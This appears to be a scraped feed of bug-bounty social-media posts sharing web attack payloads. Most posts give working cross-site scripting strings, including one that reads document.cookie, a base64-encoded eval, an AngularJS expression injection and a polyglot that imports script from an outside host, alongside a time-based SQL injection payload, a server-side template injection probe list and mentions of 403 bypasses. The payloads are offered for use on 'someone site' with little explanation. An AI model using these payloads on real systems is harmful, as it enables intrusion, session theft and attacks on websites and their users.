I have published a tool based on jadx that helps analyze Java applications. github.com/BlackFan/BFScan BFScan generates HTTP requests and OpenAPI specs based on config files and class/method annotations. It also searches strings that look like URIs, paths, or secrets.

New sql injection Payload used > '+(SELECT REPLICATE(CAST('X' AS VARCHAR(MAX)), 16500000))+' | +10 seconds delay Lower number = lower delay

I found #xss on someone site. Payload; " autofocus onfocus=alert(origin) x=" Beginner Friendly #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

XSS bypass #bugbounty #bugbountypoc

I found #xss someone site. Payload; --'<00%20foo="<0 name="<svq/onload=alert(origin)>"></00>--%20// #bugbounty #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

I found #xss someone site. Payload: "><svg/onload=alert(5)> #bugbounty #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

Reflected XSS in Chat via Markdown Bypass 🚨 🔍 Payload Used: "><a href="bing.com" onmousemove​="alert(document.cookie)">Click me</a>  "><a href="Bing.com" onmousemove​="alert('Mouse moved!')">Click me</a> 🛠 How it Works: The chat interface attempted to

Accepted #bugbountytip #bugbounty

I found #xss on site. Pyld; ">>>>>><script>var{haha:onerror=alert}=0;throw 1</script> How do you increase the impact or chain? #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

I found #xss on site. Payload: <style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss> #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #bugbountytips

403 Bypass Payloads Tags: #BugBounty #WebSecurity #EthicalHacking #bypass_403

I found #xss on someone site. Payload; <?<a href="><body onload="eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))">"> How do you increase the impact? #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

Now this is SQL injection. Watch and learn

⚠️SSTI (Server Side Template Injection) Payload List → If evaluated as 49 - the target is vulnerable: 1. {7*7} 2. {7*7} 3. {{7*7}} 4. [[7*7]] 5. ${7*7} 6. @(7*7) 7. <?=7*7?> 8. <%= 7*7 %> 9. ${= 7*7} 10. {{= 7*7}} 11. ${{7*7}} 12. #{7*7} 13. [=7*7]

Use this #XSS payload and pop alert boxes EVERYWHERE! 😎👇 JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:X55.is/.source))}//\76-->

‼️ MobSF has Stored XSS via Manifest Analysis - Dialer Code Host Field Advisory / Exploit: github.com/advisories/GHS… Severity: 8.1

🧵Bug Bounty Diaries ( D2 ) Today, I found my first "Prototype Pollution" vulnerability in the wild, but it can't be a valid bug to be reported on its own, so when you find a PP, you should dig deeper to combine it with a gadget in order to build a valid report...

Simple XSS payload for AngularJS testing. Older AngularJS versions are still vulnerable to expression injection. {{$on.constructor('alert(document.domain)')()}} #BugBounty #XSS #bugbountytips #hackerone

Boom 💥 Found an XSS on Facebook. #bugbountytips #xss